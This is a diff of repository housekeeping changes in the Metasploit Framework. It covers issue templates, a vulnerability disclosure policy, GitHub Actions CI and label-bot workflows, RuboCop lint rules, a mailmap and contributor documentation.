Land #15051 , automatically verify shell sessions

Land #15080 , add smash's details to mailmap
Add smashery to mailmap
2021-04-22 13:32:25 +10:00 · 2021-04-22 11:06:29 +10:00 · 2021-04-22 10:37:03 +10:00 · 2021-04-21 15:36:22 -05:00 · 2021-04-21 15:25:30 -05:00 · 2021-04-21 15:22:01 -05:00
4759 changed files with 110652 additions and 28070 deletions
@@ -37,24 +37,18 @@ What should happen?

 What happens instead?

-You might also want to check the last ~1k lines of
-`/opt/metasploit/apps/pro/engine/config/logs/framework.log` or
-`~/.msf4/logs/framework.log` for relevant stack traces
-
-
-## System stuff
-
 ### Metasploit version

 Get this with the `version` command in msfconsole (or `git log -1 --pretty=oneline` for a source install).

-### I installed Metasploit with:
- [ ] Kali package via apt
- [ ] Omnibus installer (nightly)
- [ ] Commercial/Community installer (from http://www.rapid7.com/products/metasploit/download.jsp)
- [ ] Source install (please specify ruby version)
+## Additional Information
+If your version is less than `5.0.96`, please update to the latest version and ensure your issue is still present.

-### OS
-
-What OS are you running Metasploit on?
+If the issue is encountered within `msfconsole`, please run the `debug` command using the instructions below. If the issue is encountered outisde `msfconsole`, or the issue causes `msfconsole` to crash on startup, please delete this section.

+1. Start `msfconsole`
+2. Run the command `set loglevel 3`
+3. Take the steps necessary recreate your issue
+4. Run the `debug` command
+5. Copy all the output below the `===8<=== CUT AND PASTE EVERYTHING BELOW THIS LINE ===8<===` line and make sure to **REMOVE ANY SENSITIVE INFORMATION.**
+6. Replace these instructions and the paragraph above with the output from step 5.
@@ -0,0 +1,35 @@
+# Reporting security issues
+
+Thanks for your interest in making Metasploit more secure! If you feel
+that you have found a security issue involving Metasploit, Meterpreter,
+Recog, or any other Rapid7 open source project, you are welcome to let
+us know in the way that's most comfortable for you.
+
+## Via ZenDesk
+
+You can click on the big blue button at [Rapid7's Vulnerability
+Disclosure][r7-vulns] page, which will get you to our general
+vulnerability reporting system. While this does require a (free) ZenDesk
+account to use, you'll get regular updates on your issue as our software
+support teams work through it. As it happens [that page][r7-vulns] also
+will tell you what to expect when it comes to reporting vulns, how fast
+we'll fix and respond, and all the rest, so it's a pretty good read
+regardless.
+
+## Via email
+
+If you're more of a traditionalist, you can email your finding to
+security@rapid7.com. If you like, you can use our [PGP key][pgp] to
+encrypt your messages, but we certainly don't mind cleartext reports
+over email.
+
+## NOT via GitHub Issues
+
+Please don't! Disclosing security vulnerabilities to public bug trackers
+is kind of mean, even when it's well-intentioned, since you end up
+dropping 0-day on pretty much everyone right out of the gate. We'd prefer
+you didn't!
+
+[r7-vulns]:https://www.rapid7.com/security/disclosure/
+[pgp]:https://keybase.io/rapid7/pgp_keys.asc?fingerprint=9a90aea0576cbcafa39c502ba5e16807959d3eda
+
@@ -1,125 +0,0 @@
-# Configuration for Github App - https://github.com/dessant/label-actions
-#
-# Note: Be aware of the edge cases of YAML when writing multiline strings:
-#   - https://yaml-multiline.info/
-#   - https://github.com/dessant/label-actions/issues/1
-pulls:
-  actions:
-    attic:
-      close: true
-      comment: |
-        Thanks for your contribution to Metasploit Framework! We've looked at this pull request, and we agree that it seems like a good addition to Metasploit, but it looks like it is not quite ready to land. We've labeled it `attic` and closed it for now.
-
-        What does this generally mean? It could be one or more of several things:
-
-        - It doesn't look like there has been any activity on this pull request in a while
-        - We may not have the proper access or equipment to test this pull request, or the contributor doesn't have time to work on it right now.
-        - Sometimes the implementation isn't quite right and a different approach is necessary.
-
-        We would love to land this pull request when it's ready. If you have a chance to address all comments, we would be happy to reopen and discuss how to merge this!
-
-    needs-docs:
-      comment: |
-        Thanks for your pull request! Before this can be merged, we need the following documentation for your module:
-
-        - [Writing Module Documentation](https://github.com/rapid7/metasploit-framework/wiki/Writing-Module-Documentation)
-        - [Template](https://github.com/rapid7/metasploit-framework/blob/master/documentation/modules/module_doc_template.md)
-        - [Examples](https://github.com/rapid7/metasploit-framework/tree/master/documentation/modules)
-
-    needs-linting:
-      comment: |
-        Thanks for your pull request! Before this pull request can be merged, it must pass the checks of our automated linting tools.
-
-        We use Rubocop and msftidy to ensure the quality of our code. This can be ran from the root directory of Metasploit:
-
-        ```
-        rubocop <directory or file>
-        tools/dev/msftidy.rb <directory or file>
-        ```
-
-        You can automate most of these changes with the `-a` flag:
-
-        ```
-        rubocop -a <directory or file>
-        ```
-
-        Please update your branch after these have been made, and reach out if you have any problems.
-
-    needs-unique-branch:
-      close: true
-      comment: |
-        Thanks for your pull request! We require for all contributed code to come from a **from a unique branch** in your repository before it can be merged.
-
-        Please create a new branch in your fork of framework and resubmit this from that branch.
-
-        If you are using Git on the command line that may look like:
-
-        ```
-        # Checkout the master branch
-        git checkout master
-
-        # Create a new branch for your feature
-        git checkout -b <BRANCH_NAME>
-
-        # Add your new files
-        git add modules/my-cool-new-module
-
-        # Commit your changes with a relevant message
-        git commit
-
-        # Push your changes to GitHub
-        git push origin <BRANCH_NAME>
-
-        # Now browse to the following URL and create your pull request!
-        # - https://github.com/rapid7/metasploit-framework/pulls
-        ```
-
-        This helps protect the process, ensure users are aware of commits on the branch being considered for merge, allows for a location for more commits to be offered without mingling with other contributor changes and allows contributors to make progress while a PR is still being reviewed.
-
-        Please do resubmit from a unique branch, we greatly value your contribution! :tada:
-
-    needs-testing-environment:
-      comment: |
-        Thanks for your pull request! As part of our landing process, we manually verify that all modules work as expected.
-
-        We have been unable to test this module successfully. This may be due to software or hardware requirements we cannot replicate.
-
-        To help unblock this pull request, please:
-
-        - Comment with links to documentation on how to set up an environment, and provide exact software version numbers to use
-        - Or comment guided steps on how to set up our environment for testing this module
-        - Or send pcaps/screenshots/recordings of it working - you can email us msfdev[at]rapid7.com
-
-        Once there's a clear path for testing and evaluating this module, we can progress with this further.
-
-    needs-pull-request-template:
-      close: false
-      comment: |
-        When creating a pull request, please ensure that the default pull request template has been updated with the required details.
-
-issues:
-  actions:
-    termux:
-      comment: |
-        Termux is not officially supported. https://github.com/rapid7/metasploit-framework/issues/11023
-
-        However, Metasploit reportedly does work with Termux.
-
-        Refer to the following for more information:
-
-        * https://wiki.termux.com/wiki/Metasploit_Framework
-        * termux/termux-packages/issues/715
-
-    needs-issue-template:
-      close: true
-      comment: |
-        When creating an issue, please ensure that the default issue template has been updated with the required details.
-
-        Closing this issue. If you believe this issue has been closed in error, please provide any relevant output and logs which may be useful in diagnosing the issue.
-
-    potato:
-      close: true
-      comment: |
-        When creating an issue, please ensure that the default issue template has been updated with the required details.
-
-        Closing this issue. If you believe this issue has been closed in error, please provide any relevant output and logs which may be useful in diagnosing the issue.
@@ -0,0 +1,217 @@
+name: Labels
+on:
+  pull_request_target:
+    types: [labeled]
+  issues:
+    types: [labeled]
+
+jobs:
+  handle-labels:
+    runs-on: ubuntu-latest
+    steps:
+      - uses: actions/github-script@v3
+        with:
+          github-token: ${{secrets.GITHUB_TOKEN}}
+          script: |
+            // NOTE: The following section is JavaScript. Note that backticks will need to be escaped within
+            // the multiline comment strings in the following config. When editing this file, using JavaScript
+            // syntax highlighting might be easier.
+            //
+            // This script has intentionally been inlined instead of using third-party Github actions for both
+            // security and performance reasons.
+            const allConfig = {
+              pullRequests: {
+                attic: {
+                  close: true,
+                  comment: `
+                    Thanks for your contribution to Metasploit Framework! We've looked at this pull request, and we agree that it seems like a good addition to Metasploit, but it looks like it is not quite ready to land. We've labeled it \`attic\` and closed it for now.
+
+                    What does this generally mean? It could be one or more of several things:
+
+                      - It doesn't look like there has been any activity on this pull request in a while
+                      - We may not have the proper access or equipment to test this pull request, or the contributor doesn't have time to work on it right now.
+                      - Sometimes the implementation isn't quite right and a different approach is necessary.
+
+                    We would love to land this pull request when it's ready. If you have a chance to address all comments, we would be happy to reopen and discuss how to merge this!
+                  `
+                },
+                'needs-docs': {
+                  close: false,
+                  comment: `
+                    Thanks for your pull request! Before this can be merged, we need the following documentation for your module:
+
+                    - [Writing Module Documentation](https://github.com/rapid7/metasploit-framework/wiki/Writing-Module-Documentation)
+                    - [Template](https://github.com/rapid7/metasploit-framework/blob/master/documentation/modules/module_doc_template.md)
+                    - [Examples](https://github.com/rapid7/metasploit-framework/tree/master/documentation/modules)
+                  `
+                },
+                'needs-linting': {
+                  close: false,
+                  comment: `
+                    Thanks for your pull request! Before this pull request can be merged, it must pass the checks of our automated linting tools.
+
+                    We use Rubocop and msftidy to ensure the quality of our code. This can be ran from the root directory of Metasploit:
+
+                    \`\`\`
+                    rubocop <directory or file>
+                    tools/dev/msftidy.rb <directory or file>
+                    \`\`\`
+
+                    You can automate most of these changes with the \`-a\` flag:
+
+                    \`\`\`
+                    rubocop -a <directory or file>
+                    \`\`\`
+
+                    Please update your branch after these have been made, and reach out if you have any problems.
+                  `
+                },
+                'needs-unique-branch': {
+                  close: true,
+                  comment: `
+                    Thanks for your pull request! We require for all contributed code to come from a **from a unique branch** in your repository before it can be merged.
+
+                    Please create a new branch in your fork of framework and resubmit this from that branch.
+
+                    If you are using Git on the command line that may look like:
+
+                    \`\`\`
+                    # Checkout the master branch
+                    git checkout master
+
+                    # Create a new branch for your feature
+                    git checkout -b <BRANCH_NAME>
+
+                    # Add your new files
+                    git add modules/my-cool-new-module
+
+                    # Commit your changes with a relevant message
+                    git commit
+
+                    # Push your changes to GitHub
+                    git push origin <BRANCH_NAME>
+
+                    # Now browse to the following URL and create your pull request!
+                    # - https://github.com/rapid7/metasploit-framework/pulls
+                    \`\`\`
+
+                    This helps protect the process, ensure users are aware of commits on the branch being considered for merge, allows for a location for more commits to be offered without mingling with other contributor changes and allows contributors to make progress while a PR is still being reviewed.
+
+                    Please do resubmit from a unique branch, we greatly value your contribution! :tada:
+                  `
+                },
+                'needs-testing-environment': {
+                  close: false,
+                  comment: `
+                    Thanks for your pull request! As part of our landing process, we manually verify that all modules work as expected.
+
+                    We have been unable to test this module successfully. This may be due to software or hardware requirements we cannot replicate.
+
+                    To help unblock this pull request, please:
+
+                    - Comment with links to documentation on how to set up an environment, and provide exact software version numbers to use
+                    - Or comment guided steps on how to set up our environment for testing this module
+                    - Or send pcaps/screenshots/recordings of it working - you can email us msfdev[at]rapid7.com
+
+                    Once there's a clear path for testing and evaluating this module, we can progress with this further.
+                  `
+                },
+                'needs-pull-request-template': {
+                  close: false,
+                  comment: `
+                    When creating a pull request, please ensure that the default pull request template has been updated with the required details.
+                  `
+                },
+              },
+              issues: {
+                // Termux issues are usually user error. However they may describe issues within modules/framework itself,
+                // and for this reason they are not closed automatically.
+                termux: {
+                  close: false,
+                  comment: `
+                    Termux is not officially supported. https://github.com/rapid7/metasploit-framework/issues/11023
+
+                    However, Metasploit reportedly does work with Termux.
+
+                    Refer to the following for more information:
+
+                    * https://wiki.termux.com/wiki/Metasploit_Framework
+                    * termux/termux-packages/issues/715
+                  `
+                },
+                // Used for issues that have had low effort applied, haven't followed the issue template, and there's not enough
+                // information to warrant staying open
+                'needs-issue-template': {
+                  close: true,
+                  comment: `
+                    When creating an issue, please ensure that the default issue template has been updated with the required details:
+                    https://github.com/rapid7/metasploit-framework/issues/new/choose
+
+                    Closing this issue. If you believe this issue has been closed in error, please provide any relevant output and logs which may be useful in diagnosing the issue.
+                  `
+                },
+                // Used for issues that have attempted to provide some details, but more information is required. This can be
+                // useful for older issues, or issues that have been raised without following the issue template fully and have
+                // useful comments present that stop it from being closed outright.
+                'needs-more-information': {
+                  close: false,
+                  comment: `
+                    It looks like there's not enough information to replicate this issue. Please provide any relevant output and logs which may be useful in diagnosing the issue.
+
+                    This includes:
+
+                    - All of the item points within this [tempate](https://github.com/rapid7/metasploit-framework/blob/master/.github/ISSUE_TEMPLATE/bug_report.md)
+                    - The result of the \`debug\` command in your Metasploit console
+                    - Screenshots showing the issues you're having
+                    - Exact replication steps
+
+                    The easier it is for us to replicate and debug an issue means there's a higher chance of this issue being resolved.
+                  `
+                },
+                // Used for issues that have zero effort applied, potentially bot related
+                // https://github.com/rapid7/metasploit-framework/pull/13280#issuecomment-616842090
+                potato: {
+                  close: true,
+                  comment: `
+                    When creating an issue, please ensure that the default issue template has been updated with the required details:
+                    https://github.com/rapid7/metasploit-framework/issues/new/choose
+
+                    Closing this issue. If you believe this issue has been closed in error, please provide any relevant output and logs which may be useful in diagnosing the issue.
+                  `
+                },
+                'ruby-3.0.0': {
+                  close: true,
+                  comment: `
+                  This issue appears to be related to Ruby 3.0.0. At this time Metasploit does not support Ruby 3.0.0.
+                  Please try using Ruby 2.7.x with Metasploit.
+
+                  Closing this issue as a duplicate of #14666 - which aims to track this feature request.
+                  `
+                },
+              }
+            };
+
+            const issueType = context.eventName === 'issues' ? 'issues' : 'pullRequests';
+            const config = allConfig[issueType][context.payload.label.name];
+            if (!config) {
+              return;
+            }
+
+            if (config.comment) {
+              const precedingWhitespaceLength = config.comment.split("\n")[1].search(/\S/);
+              const commentWithoutPreceedingWhitespace = config.comment.split("\n").map(line => line.substring(precedingWhitespaceLength)).join("\n").trim();
+              await github.issues.createComment({
+                issue_number: context.issue.number,
+                owner: context.repo.owner,
+                repo: context.repo.repo,
+                body: commentWithoutPreceedingWhitespace
+              });
+            }
+            if (config.close) {
+              await github.issues.update({
+                  issue_number: context.issue.number,
+                  owner: context.repo.owner,
+                  repo: context.repo.repo,
+                  state: 'closed'
+              });
+            }
@@ -0,0 +1,61 @@
+name: Lint
+
+on:
+  push:
+    branches-ignore:
+      - gh-pages
+      - metakitty
+  pull_request:
+    branches:
+      - '*'
+
+jobs:
+  msftidy:
+    runs-on: ubuntu-16.04
+    timeout-minutes: 40
+
+    strategy:
+      fail-fast: true
+      matrix:
+        ruby:
+          - 2.5
+
+    name: Lint msftidy
+    steps:
+      - name: Install system dependencies
+        run: sudo apt-get install libpcap-dev graphviz
+
+      - name: Checkout code
+        uses: actions/checkout@v2
+        # Required to checkout HEAD^ and 3a046f01dae340c124dd3895e670983aef5fe0c5 for the msftidy script
+        # https://github.com/actions/checkout/tree/5a4ac9002d0be2fb38bd78e4b4dbde5606d7042f#checkout-head
+        with:
+          fetch-depth: 0
+
+      - uses: actions/setup-ruby@v1
+        with:
+          ruby-version: ${{ matrix.ruby }}
+
+      - name: Setup bundler
+        run: |
+          gem install bundler
+
+      - uses: actions/cache@v2
+        with:
+          path: vendor/bundle
+          key: ${{ runner.os }}-gems-${{ hashFiles('**/Gemfile.lock') }}
+          restore-keys: |
+            ${{ runner.os }}-gems-
+
+      - name: Bundle install
+        run: |
+          bundle config path vendor/bundle
+          bundle install --jobs 4 --retry 3
+        env:
+          BUNDLER_WITHOUT: coverage development pcap
+
+      - name: Run msftidy
+        run: |
+          ln -sf ../../tools/dev/pre-commit-hook.rb ./.git/hooks/post-merge
+          ls -la ./.git/hooks
+          ./.git/hooks/post-merge
@@ -1,6 +1,6 @@
 on:
  schedule:
-    - cron: "0 16 * * *"
+    - cron: "0 15 * * 1-5"
 name: Stale Bot workflow
 jobs:
  build:
@@ -14,7 +14,7 @@ jobs:
          repo-token: ${{ secrets.GITHUB_TOKEN }}
          days-before-stale: 30
          days-before-close: 30
-          operations-per-run: 10
+          operations-per-run: 75
          stale-issue-message: |
            Hi!

@@ -32,5 +32,5 @@ jobs:

            As a friendly reminder: the best way to see this issue, or any other, fixed is to open a Pull Request.
          exempt-issue-labels: |
-            not stale
-          debug-only: true
+            not-stale,confirmed,easy,newbie-friendly,suggestion,suggestion-module,suggestion-feature,suggestion-docs,ascii-utf8-issues,database,feature,enhancement,library
+          debug-only: false
@@ -0,0 +1,107 @@
+name: Verify
+
+on:
+  push:
+    branches-ignore:
+      - gh-pages
+      - metakitty
+  pull_request:
+    branches:
+      - '*'
+
+jobs:
+  build:
+    runs-on: ubuntu-16.04
+    timeout-minutes: 40
+    name: Docker Build
+    steps:
+      - name: Checkout code
+        uses: actions/checkout@v2
+
+      - name: docker-compose build
+        run: |
+          curl -L https://github.com/docker/compose/releases/download/1.22.0/docker-compose-`uname -s`-`uname -m` > docker-compose
+          chmod +x docker-compose
+          sudo mv docker-compose /usr/bin
+
+          /usr/bin/docker-compose build
+
+  test:
+    runs-on: ubuntu-16.04
+    timeout-minutes: 40
+
+    services:
+      postgres:
+        image: postgres:9.6
+        ports: ["5432:5432"]
+        env:
+          POSTGRES_USER: postgres
+          POSTGRES_PASSWORD: postgres
+        options: >-
+          --health-cmd pg_isready
+          --health-interval 10s
+          --health-timeout 5s
+          --health-retries 5
+
+    strategy:
+      fail-fast: true
+      matrix:
+        ruby:
+          - 2.5
+          - 2.6
+          - 2.7
+        test_cmd:
+          - bundle exec rake rspec-rerun:spec SPEC_OPTS="--tag content"
+          - bundle exec rake rspec-rerun:spec SPEC_OPTS="--tag ~content"
+          # Used for testing the remote data service
+          - bundle exec rake rspec-rerun:spec SPEC_OPTS="--tag content" REMOTE_DB=1
+          - bundle exec rake rspec-rerun:spec SPEC_OPTS="--tag ~content" REMOTE_DB=1
+
+    env:
+      RAILS_ENV: test
+
+    name: Ruby ${{ matrix.ruby }} - ${{ matrix.test_cmd }}
+    steps:
+      - name: Install system dependencies
+        run: sudo apt-get install libpcap-dev graphviz
+
+      - name: Checkout code
+        uses: actions/checkout@v2
+
+      - uses: actions/setup-ruby@v1
+        with:
+          ruby-version: ${{ matrix.ruby }}
+
+      - name: Setup bundler
+        run: |
+          gem install bundler
+
+      - uses: actions/cache@v2
+        with:
+          path: vendor/bundle
+          key: ${{ runner.os }}-gems-${{ hashFiles('**/Gemfile.lock') }}
+          restore-keys: |
+            ${{ runner.os }}-gems-
+
+      - name: Bundle install
+        run: |
+          bundle config path vendor/bundle
+          bundle install --jobs 4 --retry 3
+        env:
+          BUNDLER_WITHOUT: coverage development pcap
+
+      - name: Create database
+        run: |
+          cp config/database.yml.github_actions config/database.yml
+          bundle exec rake --version
+          bundle exec rake db:create
+          bundle exec rake db:migrate
+          # fail build if db/schema.rb update is not committed
+          git diff --exit-code db/schema.rb
+
+      - name: ${{ matrix.test_cmd }}
+        run: |
+          echo "${CMD}"
+          bash -c "${CMD}"
+        env:
+          CMD: ${{ matrix.test_cmd }}
@@ -9,6 +9,7 @@ bturner-r7 <bturner-r7@github>         <brandon_turner@rapid7.com>
 bwatters-r7 <bwatters-r7@github>       <bwatters@rapid7.com>
 cdelafuente-r7 <cdelafuente-r7@github> Christophe De La Fuente <christophe_delafuente@rapid7.com>
 cdoughty-r7 <cdoughty-r7@github>       <chris_doughty@rapid7.com>
+cgranleese-r7 <cgranleese-r7@github>   <christopher_granleese@rapid7.com>
 dheiland-r7 <dheiland-r7@github>       <dh@layereddefense.com>
 dwelch-r7 <dwelch-r7@github>           <dean_welch@rapid7.com>
 ecarey-r7 <ecarey-r7@github>           <e@ipwnstuff.com>
@@ -154,6 +155,7 @@ sdavis-r7 <sdavis-r7@github>           <scott_davis@rapid7.com>
 sdavis-r7 <sdavis-r7@github>           <Scott_Davis@rapid7.com>
 sdavis-r7 <sdavis-r7@github>           <sdavis@rapid7.com>
 skape <skape@???>                      Matt Miller <mmiller@hick.org>
+smashery <smashery@github>             Ashley Donaldson <smashery@gmail.com>
 spoonm <spoonm@github>                 Spoon M <spoonm@gmail.com>
 stufus <stufus@github>                 Stuart Morgan <stuart.morgan@mwrinfosecurity.com>
 stufus <stufus@github>                 Stuart <stufus@users.noreply.github.com>
@@ -4,16 +4,145 @@
 # new modules.
 #
 # Updates to this file should include a 'Description' parameter for any
-# explaination needed.
+# explanation needed.

 # inherit_from: .rubocop_todo.yml

 AllCops:
-  TargetRubyVersion: 2.4
+  TargetRubyVersion: 2.5
+  SuggestExtensions: false
+  NewCops: disable

 require:
  - ./lib/rubocop/cop/layout/module_hash_on_new_line.rb
  - ./lib/rubocop/cop/layout/module_description_indentation.rb
+  - ./lib/rubocop/cop/layout/extra_spacing_with_bindata_ignored.rb
+  - ./lib/rubocop/cop/lint/module_disclosure_date_format.rb
+  - ./lib/rubocop/cop/lint/module_disclosure_date_present.rb
+  - ./lib/rubocop/cop/lint/deprecated_gem_version.rb
+
+Layout/SpaceBeforeBrackets:
+  Description: >-
+    Disabled as it generates invalid code:
+      https://github.com/rubocop-hq/rubocop/issues/9499
+  Enabled: false
+
+Lint/AmbiguousAssignment:
+  Enabled: true
+
+Lint/DeprecatedConstants:
+  Enabled: true
+
+Lint/DuplicateBranch:
+  Description: >-
+    Disabled as it causes a lot of noise around our current exception/error handling
+  Enabled: false
+
+Lint/DuplicateRegexpCharacterClassElement:
+  Enabled: false
+
+Lint/EmptyBlock:
+  Enabled: false
+
+Lint/EmptyClass:
+  Enabled: false
+
+Lint/LambdaWithoutLiteralBlock:
+  Enabled: true
+
+Lint/NoReturnInBeginEndBlocks:
+  Enabled: true
+
+Lint/NumberedParameterAssignment:
+  Enabled: true
+
+Lint/OrAssignmentToConstant:
+  Enabled: true
+
+Lint/RedundantDirGlobSort:
+  Enabled: true
+
+Lint/SymbolConversion:
+  Enabled: true
+
+Lint/ToEnumArguments:
+  Enabled: true
+
+Lint/TripleQuotes:
+  Enabled: true
+
+Lint/UnexpectedBlockArity:
+  Enabled: true
+
+Lint/UnmodifiedReduceAccumulator:
+  Enabled: true
+
+Style/ArgumentsForwarding:
+  Enabled: true
+
+Style/BlockComments:
+  Description: >-
+    Disabled as multiline comments are great for embedded code snippets/payloads that can
+    be copy/pasted directly into a terminal etc.
+  Enabled: false
+
+Style/CaseLikeIf:
+  Description: >-
+    This would cause a lot of noise, and potentially introduce subtly different code when
+    being auto fixed. Could potentially be enabled in isolation, but would require more
+    consideration.
+  Enabled: false
+
+Style/CollectionCompact:
+  Enabled: true
+
+Style/DocumentDynamicEvalDefinition:
+  Enabled: false
+
+Style/EndlessMethod:
+  Enabled: true
+
+Style/HashExcept:
+  Enabled: true
+
+Style/IfWithBooleanLiteralBranches:
+  Description: >-
+    Most of the time this is a valid replacement. Although it can generate subtly different
+    rewrites that might break code:
+      2.7.2 :001 > foo = nil
+      => nil
+      2.7.2 :002 > (foo && foo['key'] == 'foo') ? true : false
+      => false
+      2.7.2 :003 > foo && foo['key'] == 'foo'
+      => nil
+  Enabled: false
+
+Style/NegatedIfElseCondition:
+  Enabled: false
+
+Style/MultipleComparison:
+  Description: >-
+    Disabled as it generates invalid code:
+      https://github.com/rubocop-hq/rubocop/issues/9520
+    It may also introduce subtle semantic issues if automatically applied to the
+    entire codebase without rigorous testing.
+  Enabled: false
+
+Style/NilLambda:
+  Enabled: true
+
+Style/RedundantArgument:
+  Enabled: false
+
+Style/RedundantAssignment:
+  Description: >-
+    Disabled as it sometimes improves the readability of code having an explicitly named
+    response object, it also makes it easier to put a breakpoint between the assignment
+    and return expression
+  Enabled: false
+
+Style/SwapValues:
+  Enabled: false

 Layout/ModuleHashOnNewLine:
  Enabled: true
@@ -21,6 +150,19 @@ Layout/ModuleHashOnNewLine:
 Layout/ModuleDescriptionIndentation:
  Enabled: true

+Lint/ModuleDisclosureDateFormat:
+  Enabled: true
+
+Lint/ModuleDisclosureDatePresent:
+  Include:
+    # Only exploits require disclosure dates, but they can be present in auxiliary modules etc.
+    - 'modules/exploits/**/*'
+
+Lint/DeprecatedGemVersion:
+  Enabled: true
+  Exclude:
+    - 'metasploit-framework.gemspec'
+
 Metrics/ClassLength:
  Description: 'Most Metasploit modules are quite large. This is ok.'
  Enabled: true
@@ -43,6 +185,17 @@ Metrics/PerceivedComplexity:
  Enabled: false
  Description: 'This is often a red-herring'

+Metrics/BlockNesting:
+  Description: >-
+    This is a good rule to follow, but will cause a lot of overhead introducing this rule.
+  Enabled: false
+
+Metrics/ParameterLists:
+  Description: >-
+    This is a good rule to follow, but will cause a lot of overhead introducing this rule.
+    Increasing the max count for now
+  Max: 8
+
 Style/TernaryParentheses:
  Enabled: false
  Description: 'This outright produces bugs'
@@ -55,6 +208,30 @@ Style/RedundantReturn:
  Description: 'This often looks weird when mixed with actual returns, and hurts nothing'
  Enabled: false

+Naming/HeredocDelimiterNaming:
+  Description: >-
+    Could be enabled in isolation with additional effort.
+  Enabled: false
+
+Naming/AccessorMethodName:
+  Description: >-
+    Disabled for now, as this naming convention is used in a lot of core library files.
+    Could be enabled in isolation with additional effort.
+  Enabled: false
+
+Naming/ConstantName:
+  Description: >-
+    Disabled for now, Metasploit is unfortunately too inconsistent with its naming to introduce
+    this. Definitely possible to enforce this in the future if need be.
+
+    Examples:
+        ManualRanking, LowRanking, etc.
+        NERR_ClientNameNotFound
+        HttpFingerprint
+        CachedSize
+        ErrUnknownTransferId
+  Enabled: false
+
 Naming/VariableNumber:
  Description: 'To make it easier to use reference code, disable this cop'
  Enabled: false
@@ -68,6 +245,7 @@ Style/Documentation:
  Description: 'Most Metasploit modules do not have class documentation.'
  Exclude:
    - 'modules/**/*'
+    - 'spec/file_fixtures/modules/**/*'

 Layout/FirstArgumentIndentation:
  Enabled: true
@@ -116,16 +294,28 @@ Style/ParenthesesAroundCondition:
  Enabled: false
  Description: 'This is used in too many places to discount, especially in ported code. Has little effect'

+Style/StringConcatenation:
+  Enabled: false
+  Description: >-
+    Disabled for now as it changes escape sequences when auto corrected:
+      https://github.com/rubocop/rubocop/issues/9543
+
+    Additionally seems to break with multiline string concatenation with trailing comments, example:
+      payload = "\x12" + # Size
+                "\x34" + # eip
+                "\x56"   # etc
+    With `rubocop -A` this will become:
+      payload = "\u00124V"    # etc
+
 Style/TrailingCommaInArrayLiteral:
  Enabled: false
  Description: 'This is often a useful pattern, and is actually required by other languages. It does not hurt.'

-Metrics/LineLength:
+Layout/LineLength:
  Description: >-
    Metasploit modules often pattern match against very
    long strings when identifying targets.
-  Enabled: true
-  Max: 180
+  Enabled: false

 Metrics/BlockLength:
  Enabled: true
@@ -172,7 +362,7 @@ Layout/EmptyLinesAroundMethodBody:
  Enabled: false
  Description: 'these are used to increase readability'

-Layout/ExtraSpacing:
+Layout/ExtraSpacingWithBinDataIgnored:
  Description: 'Do not use unnecessary spacing.'
  Enabled: true
  # When true, allows most uses of extra spacing if the intent is to align
@@ -182,7 +372,7 @@ Layout/ExtraSpacing:
  # When true, allows things like 'obj.meth(arg)  # comment',
  # rather than insisting on 'obj.meth(arg) # comment'.
  # If done for alignment, either this OR AllowForAlignment will allow it.
-  AllowBeforeTrailingComments: false
+  AllowBeforeTrailingComments: true
  # When true, forces the alignment of `=` in assignments on consecutive lines.
  ForceEqualSignAlignment: false

@@ -238,6 +428,8 @@ Style/SafeNavigation:
    configuration.
  Enabled: false

-Documentation:
-  Exclude:
-    - 'modules/**/*'
+Style/UnpackFirst:
+  Description: >-
+    Disabling to make it easier to copy/paste `unpack('h*')` expressions from code
+    into a debugging REPL.
+  Enabled: false
@@ -1 +1 @@
-2.6.6
+2.7.2
@@ -1,75 +0,0 @@
-dist: trusty
-sudo: false
-group: stable
-bundler_args: --without coverage development pcap
-cache: bundler
-addons:
-  postgresql: '9.6'
-  apt:
-    packages:
-      - libpcap-dev
-      - graphviz
-language: ruby
-rvm:
-  - '2.5.8'
-  - '2.6.6'
-
-env:
-  - CMD='bundle exec rake rspec-rerun:spec SPEC_OPTS="--tag content"'
-  - CMD='bundle exec rake rspec-rerun:spec SPEC_OPTS="--tag ~content"'
-  # Used for testing the remote data service
-  - CMD='bundle exec rake rspec-rerun:spec SPEC_OPTS="--tag content" REMOTE_DB=1'
-  - CMD='bundle exec rake rspec-rerun:spec SPEC_OPTS="--tag ~content" REMOTE_DB=1'
-
-matrix:
-  fast_finish: true
-
-jobs:
-  # build docker image
-  include:
-  - env: CMD="/usr/bin/docker-compose build" DOCKER="true"
-    # we do not need any setup
-    before_install: skip
-    install: skip
-    before_script:
-      - curl -L https://github.com/docker/compose/releases/download/1.22.0/docker-compose-`uname -s`-`uname -m` > docker-compose
-      - chmod +x docker-compose
-      - sudo mv docker-compose /usr/bin
-before_install:
-  - "echo 'gem: --no-ri --no-rdoc' > ~/.gemrc"
-  - rake --version
-  # Fail build if msftidy is not successful
-  - ln -sf ../../tools/dev/pre-commit-hook.rb ./.git/hooks/post-merge
-  - ls -la ./.git/hooks
-  - ./.git/hooks/post-merge
-  # Update the bundler
-  - gem update --system 3.0.6
-  - gem install bundler
-before_script:
-  - cp config/database.yml.travis config/database.yml
-  - bundle exec rake --version
-  - bundle exec rake db:create
-  - bundle exec rake db:migrate
-  # fail build if db/schema.rb update is not committed
-  - git diff --exit-code db/schema.rb
-script:
-  - echo "${CMD}"
-    # we need travis_wait because the Docker build job can take longer than 10 minutes
-    #- if [[ "${DOCKER}" == "true" ]]; then echo "Starting Docker build job"; travis_wait 40 "${CMD}"; else bash -c "${CMD}"; fi
-    # docker_wait is currently broken on travis-ci, so let's just run CMD directly for now
-  - bash -c "${CMD}"
-
-notifications:
-  irc: "irc.freenode.org#msfnotify"
-
-git:
-  depth: 5
-
-# Blacklist certain branches from triggering travis builds
-branches:
-  except:
-    - gh-pages
-    - metakitty
-
-services:
-  - docker
@@ -5,17 +5,17 @@ world -- a better place!  Before you get started, please review our [Code of Con
 ## Code Free Contributions 
 Before we get into the details of contributing code, you should know there are multiple ways you can add to Metasploit without any coding experience:

- - You can [submit bugs and feature requests](https://github.com/rapid7/metasploit-framework/issues/new) with detailed information about your issue or idea: 
+ - You can [submit bugs and feature requests](https://github.com/rapid7/metasploit-framework/issues/new/choose) with detailed information about your issue or idea: 
 	- If you'd like to propose a feature, describe what you'd like to see. Mock ups of console views would be great.
 	- If you're reporting a bug, please be sure to include the expected behaviour, the observed behaviour, and steps to reproduce the problem. Resource scripts, console copy-pastes, and any background on the environment you encountered the bug in would be appreciated. More information can be found [below](#bug-reports).
 - [Help fellow users with open issues]. This can require technical knowledge, but you can also get involved in conversations about bug reports and feature requests. This is a great way to get involved without getting too overwhelmed! 
 - [Help fellow committers test recently submitted pull requests](https://github.com/rapid7/metasploit-framework/pulls). Again this can require some technical skill, but by pulling down a pull request and testing it, you can help ensure our new code contributions for stability and quality. 
